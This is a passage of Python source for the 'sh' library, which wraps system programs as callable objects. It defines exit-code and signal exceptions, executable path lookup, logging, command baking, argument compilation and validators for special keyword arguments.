line = (" " * num) + line
lines.append(line)
return "\n".join(lines)
class ForkException(Exception):
def __init__(self, orig_exc):
tmpl = """
Original exception:
===================
%s
"""
msg = tmpl % _indent_text(orig_exc)
Exception.__init__(self, msg)
class ErrorReturnCodeMeta(type):
""" a metaclass which provides the ability for an ErrorReturnCode (or
derived) instance, imported from one sh module, to be considered the
subclass of ErrorReturnCode from another module. this is mostly necessary
in the tests, where we do assertRaises, but the ErrorReturnCode that the
program we're testing throws may not be the same class that we pass to
assertRaises
"""
def __subclasscheck__(self, o):
other_bases = set([b.__name__ for b in o.__bases__])
return self.__name__ in other_bases or o.__name__ == self.__name__
class ErrorReturnCode(Exception):
__metaclass__ = ErrorReturnCodeMeta
""" base class for all exceptions as a result of a command's exit status
being deemed an error. this base class is dynamically subclassed into
derived classes with the format: ErrorReturnCode_NNN where NNN is the exit
code number. the reason for this is it reduces boilerplate code when
testing error return codes:
try:
some_cmd()
except ErrorReturnCode_12:
print("couldn't do X")
vs:
try:
some_cmd()
except ErrorReturnCode as e:
if e.exit_code == 12:
print("couldn't do X")
it's not much of a savings, but i believe it makes the code easier to read """
truncate_cap = 750
def __init__(self, full_cmd, stdout, stderr, truncate=True):
self.full_cmd = full_cmd
self.stdout = stdout
self.stderr = stderr
exc_stdout = self.stdout
if truncate:
exc_stdout = exc_stdout[:self.truncate_cap]
out_delta = len(self.stdout) - len(exc_stdout)
if out_delta:
exc_stdout += ("... (%d more, please see e.stdout)" % out_delta).encode()
exc_stderr = self.stderr
if truncate:
exc_stderr = exc_stderr[:self.truncate_cap]
err_delta = len(self.stderr) - len(exc_stderr)
if err_delta:
exc_stderr += ("... (%d more, please see e.stderr)" % err_delta).encode()
msg_tmpl = unicode("\n\n RAN: {cmd}\n\n STDOUT:\n{stdout}\n\n STDERR:\n{stderr}")
msg = msg_tmpl.format(
cmd=self.full_cmd,
stdout=exc_stdout.decode(DEFAULT_ENCODING, "replace"),
stderr=exc_stderr.decode(DEFAULT_ENCODING, "replace")
)
super(ErrorReturnCode, self).__init__(msg)
class SignalException(ErrorReturnCode): pass
class TimeoutException(Exception):
""" the exception thrown when a command is killed because a specified
timeout (via _timeout) was hit """
def __init__(self, exit_code):
self.exit_code = exit_code
super(Exception, self).__init__()
SIGNALS_THAT_SHOULD_THROW_EXCEPTION = set((
signal.SIGABRT,
signal.SIGBUS,
signal.SIGFPE,
signal.SIGILL,
signal.SIGINT,
signal.SIGKILL,
signal.SIGPIPE,
signal.SIGQUIT,
signal.SIGSEGV,
signal.SIGTERM,
signal.SIGSYS,
))
# we subclass AttributeError because:
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
class CommandNotFound(AttributeError): pass
rc_exc_regex = re.compile(r"(ErrorReturnCode|SignalException)_((\d+)|SIG[a-zA-Z]+)")
rc_exc_cache = {}
SIGNAL_MAPPING = {}
for k,v in signal.__dict__.items():
if re.match(r"SIG[a-zA-Z]+", k):
SIGNAL_MAPPING[v] = k
def get_exc_from_name(name):
""" takes an exception name, like:
ErrorReturnCode_1
SignalException_9
SignalException_SIGHUP
and returns the corresponding exception. this is primarily used for
importing exceptions from sh into user code, for instance, to capture those
exceptions """
exc = None
try:
return rc_exc_cache[name]
except KeyError:
m = rc_exc_regex.match(name)
if m:
base = m.group(1)
rc_or_sig_name = m.group(2)
if base == "SignalException":
try:
rc = -int(rc_or_sig_name)
except ValueError:
rc = -getattr(signal, rc_or_sig_name)
else:
rc = int(rc_or_sig_name)
exc = get_rc_exc(rc)
return exc
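# illustrative usage (a sketch, not part of the library):
#
#   get_exc_from_name("ErrorReturnCode_1")        # -> the ErrorReturnCode_1 class
#   get_exc_from_name("SignalException_SIGHUP")   # -> the SignalException_SIGHUP class
#   get_exc_from_name("SomethingElse")            # -> None, name doesn't match the regex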
def get_rc_exc(rc):
""" takes a exit code or negative signal number and produces an exception
that corresponds to that return code. positive return codes yield
ErrorReturnCode exception, negative return codes yield SignalException
we also cache the generated exception so that only one signal of that type
exists, preserving identity """
try:
return rc_exc_cache[rc]
except KeyError:
pass
if rc > 0:
name = "ErrorReturnCode_%d" % rc
base = ErrorReturnCode
else:
signame = SIGNAL_MAPPING[abs(rc)]
name = "SignalException_" + signame
base = SignalException
exc = ErrorReturnCodeMeta(name, (base,), {"exit_code": rc})
rc_exc_cache[rc] = exc
return exc
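# illustrative usage (a sketch, not part of the library):
#
#   get_rc_exc(2)                    # -> dynamically-created ErrorReturnCode_2
#   get_rc_exc(-signal.SIGKILL)      # -> SignalException_SIGKILL
#   get_rc_exc(2) is get_rc_exc(2)   # -> True, thanks to rc_exc_cache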
# we monkey patch glob. i'm normally generally against monkey patching, but i
# decided to do this really un-intrusive patch because we need a way to detect
# if a list that we pass into an sh command was generated from glob. the reason
# being that glob returns an empty list if a pattern is not found, and so
# commands will treat the empty list as no arguments, which can be a problem,
# ie:
#
# ls(glob("*.ojfawe"))
#
# ^ will show the contents of your current directory, because it's essentially
# running ls([]) which, as a process, is just "ls".
#
# so we subclass list and monkey patch the glob function. nobody should be the
# wiser, but we'll have results that we can make some determinations on
_old_glob = glob_module.glob
class GlobResults(list):
def __init__(self, path, results):
self.path = path
list.__init__(self, results)
def glob(path, *args, **kwargs):
expanded = GlobResults(path, _old_glob(path, *args, **kwargs))
return expanded
glob_module.glob = glob
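# illustrative effect of the patch (a sketch, not part of the library): with an
# unmatched pattern, the stock glob would return a plain empty list, silently
# turning ls(glob("*.ojfawe")) into a bare "ls". with GlobResults, compile_args()
# below can detect the empty glob and pass the original pattern string through
# as a literal argument instead, so the command fails loudly rather than doing
# something unintended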
def which(program, paths=None):
""" takes a program name or full path, plus an optional collection of search
paths, and returns the full path of the requested executable. if paths is
specified, it is the entire list of search paths, and the PATH env is not
used at all. otherwise, PATH env is used to look for the program """
def is_exe(fpath):
return (os.path.exists(fpath) and
os.access(fpath, os.X_OK) and
os.path.isfile(os.path.realpath(fpath)))
found_path = None
fpath, fname = os.path.split(program)
# if there's a path component, then we've specified a path to the program,
# and we should just test if that program is executable. if it is, return
if fpath:
program = os.path.abspath(os.path.expanduser(program))
if is_exe(program):
found_path = program
# otherwise, we've just passed in the program name, and we need to search
# the paths to find where it actually lives
else:
paths_to_search = []
if isinstance(paths, (tuple, list)):
paths_to_search.extend(paths)
else:
env_paths = os.environ.get("PATH", "").split(os.pathsep)
paths_to_search.extend(env_paths)
for path in paths_to_search:
exe_file = os.path.join(path, program)
if is_exe(exe_file):
found_path = exe_file
break
return found_path
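# illustrative usage (a sketch; actual paths depend on the system):
#
#   which("ls")                          # -> e.g. "/bin/ls", found via the PATH env
#   which("ls", paths=["/nonexistent"])  # -> None, PATH is NOT consulted when paths is given
#   which("/bin/ls")                     # -> "/bin/ls", if it exists and is executable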
def resolve_command_path(program):
path = which(program)
if not path:
# our actual command might have a dash in it, but we can't call
# that from python (we have to use underscores), so we'll check
# if a dash version of our underscore command exists and use that
# if it does
if "_" in program:
path = which(program.replace("_", "-"))
if not path:
return None
return path
def resolve_command(name, baked_args=None):
path = resolve_command_path(name)
cmd = None
if path:
cmd = Command(path)
if baked_args:
cmd = cmd.bake(**baked_args)
return cmd
class Logger(object):
""" provides a memory-inexpensive logger. a gotcha about python's builtin
logger is that logger objects are never garbage collected. if you create a
thousand loggers with unique names, they'll sit there in memory until your
script is done. with sh, it's easy to create loggers with unique names if
we want our loggers to include our command arguments. for example, these
are all unique loggers:
ls -l
ls -l /tmp
ls /tmp
so instead of creating unique loggers, and without sacrificing logging
output, we use this class, which maintains as part of its state, the logging
"context", which will be the very unique name. this allows us to get a
logger with a very general name, eg: "command", and have a unique name
appended to it via the context, eg: "ls -l /tmp" """
def __init__(self, name, context=None):
self.name = name
self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name))
self.set_context(context)
def _format_msg(self, msg, *args):
if self.context:
msg = "%s: %s" % (self.context, msg)
return msg % args
def set_context(self, context):
if context:
context = context.replace("%", "%%")
self.context = context or ""
def get_child(self, name, context):
new_name = self.name + "." + name
new_context = self.context + "." + context
l = Logger(new_name, new_context)
return l
def info(self, msg, *args):
self.log.info(self._format_msg(msg, *args))
def debug(self, msg, *args):
self.log.debug(self._format_msg(msg, *args))
def error(self, msg, *args):
self.log.error(self._format_msg(msg, *args))
def exception(self, msg, *args):
self.log.exception(self._format_msg(msg, *args))
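# illustrative usage (a sketch, not part of the library):
#
#   log = Logger("command", "ls -l /tmp")
#   log.info("starting process")
#
# this logs "ls -l /tmp: starting process" through the single shared
# "<SH_LOGGER_NAME>.command" logger, instead of creating a new logger per
# command-line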
def default_logger_str(cmd, call_args, pid=None):
if pid:
s = "<Command %r, pid %d>" % (cmd, pid)
else:
s = "<Command %r>" % cmd
return s
class RunningCommand(object):
""" this represents an executing Command object. it is returned as the
result of __call__() being executed on a Command instance. this creates a
reference to a OProc instance, which is a low-level wrapper around the
process that was exec'd
this is the class that gets manipulated the most by user code, and so it
implements various convenience methods and logical mechanisms for the
underlying process. for example, if a user tries to access a
backgrounded-process's stdout/err, the RunningCommand object is smart enough
to know to wait() on the process to finish first. and when the process
finishes, RunningCommand is smart enough to translate exit codes to
exceptions. """
# these are attributes that we allow to pass through to the OProc object
_OProc_attr_whitelist = set((
"signal",
"terminate",
"kill",
"kill_group",
"signal_group",
"pid",
"sid",
"pgid",
"ctty",
"input_thread_exc",
"output_thread_exc",
"bg_thread_exc",
))
def __init__(self, cmd, call_args, stdin, stdout, stderr):
"""
cmd is an array, where each element is encoded as bytes (PY3) or str
(PY2)
"""
# self.ran is used for auditing what actually ran. for example, in
# exceptions, or if you just want to know what was run after the
# command ran
#
# here we're making a consistent unicode string out of our cmd.
# we're also assuming (correctly, i think) that the command and its
# arguments are the encoding we pass into _encoding, which falls back to
# the system's encoding
enc = call_args["encoding"]
self.ran = " ".join([shlex_quote(arg.decode(enc, "ignore")) for arg in cmd])
self.call_args = call_args
self.cmd = cmd
self.process = None
self._process_completed = False
should_wait = True
spawn_process = True
# this is used to track if we've already raised StopIteration, and if we
# have, raise it immediately again if the user tries to call next() on
# us. https://github.com/amoffat/sh/issues/273
self._stopped_iteration = False
# with contexts shouldn't run at all yet, they prepend
# to every command in the context
if call_args["with"]:
spawn_process = False
get_prepend_stack().append(self)
if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
should_wait = False
# we're running in the background, return self and let us lazily
# evaluate
if call_args["bg"]:
should_wait = False
# redirection
if call_args["err_to_out"]:
stderr = OProc.STDOUT
done_callback = call_args["done"]
if done_callback:
call_args["done"] = partial(done_callback, self)
# set up which stream should write to the pipe
# TODO, make pipe None by default and limit the size of the Queue
# in oproc.OProc
pipe = OProc.STDOUT
if call_args["iter"] == "out" or call_args["iter"] is True:
pipe = OProc.STDOUT
elif call_args["iter"] == "err":
pipe = OProc.STDERR
if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True:
pipe = OProc.STDOUT
elif call_args["iter_noblock"] == "err":
pipe = OProc.STDERR
# there's currently only one case where we wouldn't spawn a child
# process, and that's if we're using a with-context with our command
self._spawned_and_waited = False
if spawn_process:
log_str_factory = call_args["log_msg"] or default_logger_str
logger_str = log_str_factory(self.ran, call_args)
self.log = Logger("command", logger_str)
self.log.info("starting process")
if should_wait:
self._spawned_and_waited = True
# this lock is needed because of a race condition where a background
# thread, created in the OProc constructor, may try to access
# self.process, but it has not been assigned yet
process_assign_lock = threading.Lock()
with process_assign_lock:
self.process = OProc(self, self.log, cmd, stdin, stdout, stderr,
self.call_args, pipe, process_assign_lock)
logger_str = log_str_factory(self.ran, call_args, self.process.pid)
self.log.set_context(logger_str)
self.log.info("process started")
if should_wait:
self.wait()
def wait(self):
""" waits for the running command to finish. this is called on all
running commands, eventually, except for ones that run in the background
"""
if not self._process_completed:
self._process_completed = True
exit_code = self.process.wait()
if self.process.timed_out:
# if we timed out, our exit code represents a signal, which is
# negative, so let's make it positive to store in our
# TimeoutException
raise TimeoutException(-exit_code)
else:
self.handle_command_exit_code(exit_code)
# if an iterable command is using an instance of OProc for its stdin,
# wait on it. the process is probably set to "piped", which means it
# won't be waited on, which means exceptions won't propagate up to the
# main thread. this allows them to bubble up
if self.process._stdin_process:
self.process._stdin_process.command.wait()
self.log.info("process completed")
return self
def handle_command_exit_code(self, code):
""" here we determine if we had an exception, or an error code that we
weren't expecting to see. if we did, we create and raise an exception
"""
ca = self.call_args
exc_class = get_exc_exit_code_would_raise(code, ca["ok_code"],
ca["piped"])
if exc_class:
exc = exc_class(self.ran, self.process.stdout, self.process.stderr,
ca["truncate_exc"])
raise exc
@property
def stdout(self):
self.wait()
return self.process.stdout
@property
def stderr(self):
self.wait()
return self.process.stderr
@property
def exit_code(self):
self.wait()
return self.process.exit_code
def __len__(self):
return len(str(self))
def __enter__(self):
""" we don't actually do anything here because anything that should have
been done would have been done in the Command.__call__ call.
essentially all that has to happen is for the command to be pushed on the
prepend stack. """
pass
def __iter__(self):
return self
def next(self):
""" allow us to iterate over the output of our command """
if self._stopped_iteration:
raise StopIteration()
# we do this because if get blocks, we can't catch a KeyboardInterrupt
# so the slight timeout allows for that.
while True:
try:
chunk = self.process._pipe_queue.get(True, 0.001)
except Empty:
if self.call_args["iter_noblock"]:
return errno.EWOULDBLOCK
else:
if chunk is None:
self.wait()
self._stopped_iteration = True
raise StopIteration()
try:
return chunk.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
except UnicodeDecodeError:
return chunk
# python 3
__next__ = next
def __exit__(self, typ, value, traceback):
if self.call_args["with"] and get_prepend_stack():
get_prepend_stack().pop()
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return unicode(self).encode(self.call_args["encoding"])
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
RunningCommand object will call this """
if self.process and self.stdout:
return self.stdout.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
elif IS_PY3:
return ""
else:
return unicode("")
def __eq__(self, other):
return unicode(self) == unicode(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __contains__(self, item):
return item in str(self)
def __getattr__(self, p):
# let these whitelisted attributes pass through to the OProc object
if p in self._OProc_attr_whitelist:
if self.process:
return getattr(self.process, p)
else:
raise AttributeError
# see if strings have what we're looking for. we're looking at the
# method names explicitly because we don't want to evaluate self unless
# we absolutely have to, the reason being, in python2, hasattr swallows
# exceptions, and if we try to run hasattr on a command that failed and
# is being run with _iter=True, the command will be evaluated, throw an
# exception, but hasattr will discard it
if p in _unicode_methods:
return getattr(unicode(self), p)
raise AttributeError
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
try:
return str(self)
except UnicodeDecodeError:
if self.process:
if self.stdout:
return repr(self.stdout)
return repr("")
def __long__(self):
return long(str(self).strip())
def __float__(self):
return float(str(self).strip())
def __int__(self):
return int(str(self).strip())
def output_redirect_is_filename(out):
return isinstance(out, basestring)
def get_prepend_stack():
tl = Command.thread_local
if not hasattr(tl, "_prepend_stack"):
tl._prepend_stack = []
return tl._prepend_stack
def special_kwarg_validator(kwargs, invalid_list):
s1 = set(kwargs.keys())
invalid_args = []
for args in invalid_list:
if callable(args):
fn = args
ret = fn(kwargs)
invalid_args.extend(ret)
else:
args, error_msg = args
if s1.issuperset(args):
invalid_args.append((args, error_msg))
return invalid_args
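# illustrative usage (a sketch, not part of the library): entries in
# invalid_list are either (arg-name-tuple, error-message) pairs, which trigger
# when ALL of the named kwargs are present, or callables that receive the
# kwargs and return their own list of ((args...), error) tuples, e.g.
#
#   special_kwarg_validator({"fg": True, "bg": True},
#                           [(("fg", "bg"), "can't do both")])
#   # -> [(("fg", "bg"), "can't do both")]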
def get_fileno(ob):
# in py2, this will return None. in py3, it will return a method that
# raises when called
fileno_meth = getattr(ob, "fileno", None)
fileno = None
if fileno_meth:
# py3 StringIO objects will report a fileno, but calling it will raise
# an exception
try:
fileno = fileno_meth()
except UnsupportedOperation:
pass
elif isinstance(ob, (int,long)) and ob >= 0:
fileno = ob
return fileno
def ob_is_tty(ob):
""" checks if an object (like a file-like object) is a tty. """
fileno = get_fileno(ob)
is_tty = False
if fileno is not None:
is_tty = os.isatty(fileno)
return is_tty
def ob_is_pipe(ob):
fileno = get_fileno(ob)
is_pipe = False
if fileno:
fd_stat = os.fstat(fileno)
is_pipe = stat.S_ISFIFO(fd_stat.st_mode)
return is_pipe
def tty_in_validator(kwargs):
pairs = (("tty_in", "in"), ("tty_out", "out"))
invalid = []
for tty, std in pairs:
if tty in kwargs and ob_is_tty(kwargs.get(std, None)):
args = (tty, std)
error = "`_%s` is a TTY already, so so it doesn't make sense \
to set up a TTY with `_%s`" % (std, tty)
invalid.append((args, error))
return invalid
def bufsize_validator(kwargs):
""" a validator to prevent a user from saying that they want custom
buffering when they're using an in/out object that will be os.dup'd to the
process, and has its own buffering. an example is a pipe or a tty. it
doesn't make sense to tell them to have a custom buffering, since the os
controls this. """
invalid = []
in_ob = kwargs.get("in", None)
out_ob = kwargs.get("out", None)
in_buf = kwargs.get("in_bufsize", None)
out_buf = kwargs.get("out_bufsize", None)
in_no_buf = ob_is_tty(in_ob) or ob_is_pipe(in_ob)
out_no_buf = ob_is_tty(out_ob) or ob_is_pipe(out_ob)
err = "Can't specify an {target} bufsize if the {target} target is a pipe or TTY"
if in_no_buf and in_buf is not None:
invalid.append((("in", "in_bufsize"), err.format(target="in")))
if out_no_buf and out_buf is not None:
invalid.append((("out", "out_bufsize"), err.format(target="out")))
return invalid
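# illustrative failure case (a sketch, not part of the library): if _out is a
# pipe or a tty, specifying _out_bufsize as well is rejected, e.g.
#
#   read_fd, write_fd = os.pipe()
#   bufsize_validator({"out": write_fd, "out_bufsize": 1024})
#   # -> [(("out", "out_bufsize"), "Can't specify an out bufsize if the ...")]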
def env_validator(kwargs):
""" a validator to check that env is a dictionary and that all environment variable
keys and values are strings. Otherwise, we would exit with a confusing exit code 255. """
invalid = []
env = kwargs.get("env", None)
if env is None:
return invalid
if not isinstance(env, dict):
invalid.append((("env"), "env must be a dict. Got {!r}".format(env)))
return invalid
for k, v in kwargs["env"].items():
if not isinstance(k, str):
invalid.append((("env"), "env key {!r} must be a str".format(k)))
if not isinstance(v, str):
invalid.append((("env"), "value {!r} of env key {!r} must be a str".format(v, k)))
return invalid
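# illustrative results (a sketch, not part of the library):
#
#   env_validator({"env": "PATH=/usr/bin"})       # not a dict -> one invalid entry
#   env_validator({"env": {"N": 1}})              # non-str value -> one invalid entry
#   env_validator({"env": {"PATH": "/usr/bin"}})  # -> [] (valid)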
class Command(object):
""" represents an un-run system program, like "ls" or "cd". because it
represents the program itself (and not a running instance of it), it should
hold very little state. in fact, the only state it does hold is baked
arguments.
when a Command object is called, the result that is returned is a
RunningCommand object, which represents the Command put into an execution
state. """
thread_local = threading.local()
_call_args = {
"fg": False, # run command in foreground
# run a command in the background. commands run in the background
# ignore SIGHUP and do not automatically exit when the parent process
# ends
"bg": False,
# automatically report exceptions for background commands
"bg_exc": True,
"with": False, # prepend the command to every command after it
"in": None,
"out": None, # redirect STDOUT
"err": None, # redirect STDERR
"err_to_out": None, # redirect STDERR to STDOUT
# stdin buffer size
# 1 for line, 0 for unbuffered, any other number for that amount
"in_bufsize": 0,
# stdout buffer size, same values as above
"out_bufsize": 1,
"err_bufsize": 1,
# this is how big the output buffers will be for stdout and stderr.
# this is essentially how much output they will store from the process.
# we use a deque, so if it overflows past this amount, the first items
# get pushed off as each new item gets added.
#
# NOTICE
# this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
# you're buffering out/err at 1024 bytes, the internal buffer size will
# be "internal_bufsize" CHUNKS of 1024 bytes
"internal_bufsize": 3 * 1024 ** 2,
"env": None,
"piped": None,
"iter": None,
"iter_noblock": None,
"ok_code": 0,
"cwd": None,
# the separator delimiting between a long-argument's name and its value
# setting this to None will cause name and value to be two separate
# arguments, like for short options
# for example, --arg=derp, '=' is the long_sep
"long_sep": "=",
# the prefix used for long arguments
"long_prefix": "--",
# this is for programs that expect their input to be from a terminal.
# ssh is one of those programs
"tty_in": False,
"tty_out": True,
"encoding": DEFAULT_ENCODING,
"decode_errors": "strict",
# how long the process should run before it is auto-killed
"timeout": None,
"timeout_signal": signal.SIGKILL,
# TODO write some docs on "long-running processes"
# these control whether or not stdout/err will get aggregated together
# as the process runs. this has memory usage implications, so sometimes
# with long-running processes with a lot of data, it makes sense to
# set these to true
"no_out": False,
"no_err": False,
"no_pipe": False,
# if any redirection is used for stdout or stderr, internal buffering
# of that data is not stored. this forces it to be stored, as if
# the output is being T'd to both the redirected destination and our
# internal buffers
"tee": None,
# will be called when a process terminates regardless of exception
"done": None,
# a tuple (rows, columns) of the desired size of both the stdout and
# stdin ttys, if ttys are being used
"tty_size": (20, 80),
# whether or not our exceptions should be truncated
"truncate_exc": True,
# a function to call after the child forks but before the process execs
"preexec_fn": None,
# UID to set after forking. Requires root privileges. Not supported on
# Windows.
"uid": None,
# put the forked process in its own process session?
"new_session": True,
# pre-process args passed into __call__. only really useful when used
# in .bake()
"arg_preprocess": None,
# a callable that produces a log message from an argument tuple of the
# command and the args
"log_msg": None,
# whether or not to close all inherited fds. typically, this should be True, as inheriting fds can be a security
# vulnerability
"close_fds": True,
# a whitelist of the integer fds to pass through to the child process. setting this forces close_fds to be True
"pass_fds": set(),
}
# this is a collection of validators to make sure the special kwargs make
# sense
_kwarg_validators = (
(("fg", "bg"), "Command can't be run in the foreground and background"),
(("fg", "err_to_out"), "Can't redirect STDERR in foreground mode"),
(("err", "err_to_out"), "Stderr is already being redirected"),
(("piped", "iter"), "You cannot iterate when this command is being piped"),
(("piped", "no_pipe"), "Using a pipe doesn't make sense if you've disabled the pipe"),
(("no_out", "iter"), "You cannot iterate over output if there is no output"),
(("close_fds", "pass_fds"), "Passing `pass_fds` forces `close_fds` to be True"),
tty_in_validator,
bufsize_validator,
env_validator,
)
def __init__(self, path, search_paths=None):
found = which(path, search_paths)
self._path = encode_to_py3bytes_or_py2str("")
# is the command baked (aka, partially applied)?
self._partial = False
self._partial_baked_args = []
self._partial_call_args = {}
# bugfix for functools.wraps. issue #121
self.__name__ = str(self)
if not found:
raise CommandNotFound(path)
# the reason why we set the values early in the constructor, and again
# here, is for people who have tools that inspect the stack on
# exception. if CommandNotFound is raised, we need self._path and the
# other attributes to be set correctly, so repr() works when they're
# inspecting the stack. issue #304
self._path = encode_to_py3bytes_or_py2str(found)
self.__name__ = str(self)
def __getattribute__(self, name):
# convenience
getattr = partial(object.__getattribute__, self)
val = None
if name.startswith("_"):
val = getattr(name)
elif name == "bake":
val = getattr("bake")
# here we have a way of getting past shadowed subcommands. for example,
# if "git bake" was a thing, we wouldn't be able to do `git.bake()`
# because `.bake()` is already a method. so we allow `git.bake_()`
elif name.endswith("_"):
name = name[:-1]
if val is None:
val = getattr("bake")(name)
return val
@staticmethod
def _extract_call_args(kwargs):
""" takes kwargs that were passed to a command's __call__ and extracts
out the special keyword arguments, we return a tuple of special keyword
args, and kwargs that will go to the execd command """
kwargs = kwargs.copy()
call_args = {}
for parg, default in Command._call_args.items():
key = "_" + parg
if key in kwargs:
call_args[parg] = kwargs[key]
del kwargs[key]
invalid_kwargs = special_kwarg_validator(call_args,
Command._kwarg_validators)
if invalid_kwargs:
exc_msg = []
for args, error_msg in invalid_kwargs:
exc_msg.append(" %r: %s" % (args, error_msg))
exc_msg = "\n".join(exc_msg)
raise TypeError("Invalid special arguments:\n\n%s\n" % exc_msg)
return call_args, kwargs
# TODO needs documentation
def bake(self, *args, **kwargs):
fn = type(self)(self._path)
fn._partial = True
call_args, kwargs = self._extract_call_args(kwargs)
pruned_call_args = call_args
for k, v in Command._call_args.items():
try:
if pruned_call_args[k] == v:
del pruned_call_args[k]
except KeyError:
continue
fn._partial_call_args.update(self._partial_call_args)
fn._partial_call_args.update(pruned_call_args)
fn._partial_baked_args.extend(self._partial_baked_args)
sep = pruned_call_args.get("long_sep", self._call_args["long_sep"])
prefix = pruned_call_args.get("long_prefix",
self._call_args["long_prefix"])
fn._partial_baked_args.extend(compile_args(args, kwargs, sep, prefix))
return fn
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return self.__unicode__().encode(DEFAULT_ENCODING)
def __eq__(self, other):
return str(self) == str(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
return "<Command %r>" % str(self)
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
self will call this """
baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args)
if baked_args:
baked_args = " " + baked_args
return self._path.decode(DEFAULT_ENCODING) + baked_args
def __enter__(self):
self(_with=True)
def __exit__(self, typ, value, traceback):
get_prepend_stack().pop()
def __call__(self, *args, **kwargs):
kwargs = kwargs.copy()
args = list(args)
# this will hold our final command, including arguments, that will be
# execd
cmd = []
# this will hold a complete mapping of all our special keyword arguments
# and their values
call_args = Command._call_args.copy()
# aggregate any 'with' contexts
for prepend in get_prepend_stack():
pcall_args = prepend.call_args.copy()
# don't pass the 'with' call arg
pcall_args.pop("with", None)
call_args.update(pcall_args)
cmd.extend(prepend.cmd)
cmd.append(self._path)
# do we have an argument pre-processor? if so, run it. we need to do
# this early, so that args, kwargs are accurate
preprocessor = self._partial_call_args.get("arg_preprocess", None)
if preprocessor:
args, kwargs = preprocessor(args, kwargs)
# here we extract the special kwargs and override any
# special kwargs from the possibly baked command
extracted_call_args, kwargs = self._extract_call_args(kwargs)
call_args.update(self._partial_call_args)
call_args.update(extracted_call_args)
# handle a None. this is added back only to not break the api in the
# 1.* version. TODO remove this in 2.0, as "ok_code", if specified,
# should always be a definitive value or list of values, and None is
# ambiguous
if call_args["ok_code"] is None:
call_args["ok_code"] = 0
if not getattr(call_args["ok_code"], "__iter__", None):
call_args["ok_code"] = [call_args["ok_code"]]
# check if we're piping via composition
stdin = call_args["in"]
if args:
first_arg = args.pop(0)
if isinstance(first_arg, RunningCommand):
if first_arg.call_args["piped"]:
stdin = first_arg.process
else:
stdin = first_arg.process._pipe_queue
else:
args.insert(0, first_arg)
processed_args = compile_args(args, kwargs, call_args["long_sep"],
call_args["long_prefix"])
# makes sure our arguments are broken up correctly
split_args = self._partial_baked_args + processed_args
final_args = split_args
cmd.extend(final_args)
# if we're running in foreground mode, we need to completely bypass
# launching a RunningCommand and OProc and just do a spawn
if call_args["fg"]:
if call_args["env"] is None:
launch = lambda: os.spawnv(os.P_WAIT, cmd[0], cmd)
else:
launch = lambda: os.spawnve(os.P_WAIT, cmd[0], cmd, call_args["env"])
exit_code = launch()
exc_class = get_exc_exit_code_would_raise(exit_code,
call_args["ok_code"], call_args["piped"])
if exc_class:
if IS_PY3:
ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd])
else:
ran = " ".join(cmd)
exc = exc_class(ran, b"", b"", call_args["truncate_exc"])
raise exc
return None
# stdout redirection
stdout = call_args["out"]
if output_redirect_is_filename(stdout):
stdout = open(str(stdout), "wb")
# stderr redirection
stderr = call_args["err"]
if output_redirect_is_filename(stderr):
stderr = open(str(stderr), "wb")
return RunningCommand(cmd, call_args, stdin, stdout, stderr)
def compile_args(args, kwargs, sep, prefix):
""" takes args and kwargs, as they were passed into the command instance
being executed with __call__, and composes them into a flat list that
will eventually be fed into exec. example:
with this call:
sh.ls("-l", "/tmp", color="never")
this function receives
args = ['-l', '/tmp']
kwargs = {'color': 'never'}
and produces
['-l', '/tmp', '--color=never']
"""
processed_args = []
encode = encode_to_py3bytes_or_py2str
# aggregate positional args
for arg in args:
if isinstance(arg, (list, tuple)):
if isinstance(arg, GlobResults) and not arg:
arg = [arg.path]
for sub_arg in arg:
processed_args.append(encode(sub_arg))
elif isinstance(arg, dict):
processed_args += aggregate_keywords(arg, sep, prefix, raw=True)
else:
processed_args.append(encode(arg))
# aggregate the keyword arguments
processed_args += aggregate_keywords(kwargs, sep, prefix)
return processed_args
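# illustrative result (a sketch, not part of the library; py3 bytes shown):
#
#   compile_args(["-l", "/tmp"], {"color": "never"}, "=", "--")
#   # -> [b"-l", b"/tmp", b"--color=never"]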
def aggregate_keywords(keywords, sep, prefix, raw=False):
""" take our keyword arguments, and a separator, and compose the list of
flat long (and short) arguments. example
{'color': 'never', 't': True, 'something': True} with sep '='
becomes
['--color=never', '-t', '--something']
the `raw` argument indicates whether or not we should leave the argument
name alone, or whether we should replace "_" with "-". if we pass in a
dictionary, like this:
sh.command({"some_option": 12})
then `raw` gets set to True, because we want to leave the key as-is, to
produce:
['--some_option=12']
but if we just use a command's kwargs, `raw` is False, which means this:
sh.command(some_option=12)
becomes:
['--some-option=12']
essentially, using kwargs is a convenience, but it lacks the ability to
put a '-' in the name, so we do the replacement of '_' to '-' for you.
but when you really don't want that to happen, you should use a
dictionary instead with the exact names you want
"""
processed = []
encode = encode_to_py3bytes_or_py2str
for k, v in keywords.items():
# we're passing a short arg as a kwarg, example:
# cut(d="\t")
if len(k) == 1:
if v is not False:
processed.append(encode("-" + k))
if v is not True:
processed.append(encode(v))
# we're doing a long arg
else:
if not raw:
k = k.replace("_", "-")
if v is True:
processed.append(encode(prefix + k))
elif v is False:
pass
elif sep is None or sep == " ":
processed.append(encode(prefix + k))
processed.append(encode(v))
else:
arg = encode("%s%s%s%s" % (prefix, k, sep, v))
processed.append(arg)
return processed
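# illustrative results (a sketch, not part of the library; py3 bytes shown,
# ordering follows dict insertion order):
#
#   aggregate_keywords({"some_option": 12}, "=", "--")            # -> [b"--some-option=12"]
#   aggregate_keywords({"some_option": 12}, "=", "--", raw=True)  # -> [b"--some_option=12"]
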